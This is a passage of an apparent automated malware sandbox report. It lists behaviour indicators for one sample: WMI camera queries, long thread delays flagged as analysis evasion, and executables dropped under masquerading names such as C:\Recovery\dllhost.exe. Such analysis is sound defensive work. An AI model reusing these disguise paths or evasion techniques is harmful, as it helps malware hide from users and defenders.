                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion

                          Source: C:\Recovery\dllhost.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Recovery\dllhost.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1490000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1B220000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 3080000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1B290000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 16B0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1B340000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: 25C0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: 1A790000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: A50000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: 1A440000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: A60000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: 1A540000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: 2700000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: 1A8A0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 21C0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1A460000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 15E0000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1B2E0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1640000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1B2C0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1270000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1AC80000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: E70000 memory reserve | memory write watch
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Memory allocated: 1ACE0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: CC0000 memory reserve | memory write watch
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Memory allocated: 1A820000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1240000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Memory allocated: 1ADE0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 10A0000 memory reserve | memory write watch
                          Source: C:\Recovery\dllhost.exe Memory allocated: 1AC00000 memory reserve | memory write watch
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 600000
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599881
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599734
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599623
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599514
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599390
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599274
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599169
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 599062
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 3600000
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598951
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598843
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 300000
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598718
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598563
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598359
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598214
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 598085
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597930
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597734
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597590
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597464
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597358
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597246
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 597130
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596984
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596836
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596718
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596609
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596496
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596375
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596265
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 596040
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595794
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595680
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595578
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595465
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595359
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595250
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595140
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 595010
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594906
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594797
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594682
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594578
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594468
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594359
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594250
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594140
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 594017
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 593901
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 593500
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 593350
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 593232
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 593117
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592999
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592886
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592757
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592621
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592500
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592390
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 592280
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\GameBarPresenceWriter\TyCvtMoTOGrwUAEyotiaCQmKvM.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Program Files\Mozilla Firefox\defaults\pref\Idle.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Recovery\dllhost.exe Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3754
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3776
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3619
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3421
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3159
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3290
                          Source: C:\Recovery\dllhost.exe Window / User API: threadDelayed 9665
                          Source: C:\Users\user\Desktop\UuIspZT5b6.exe Dropped PE file which has not been started: C:\Users\user\Desktop\gSKbOmrW.log
                          Source: C:\Recovery\dllhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\tznhlkeP.log
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exe
                          Source: C:\Recovery\dllhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\CkfpANUC.log
                          Source: C:\Recovery\dllhost.exe Dropped PE file which has not been started: C:\Users\user\Desktop\MQZNFpoe.log
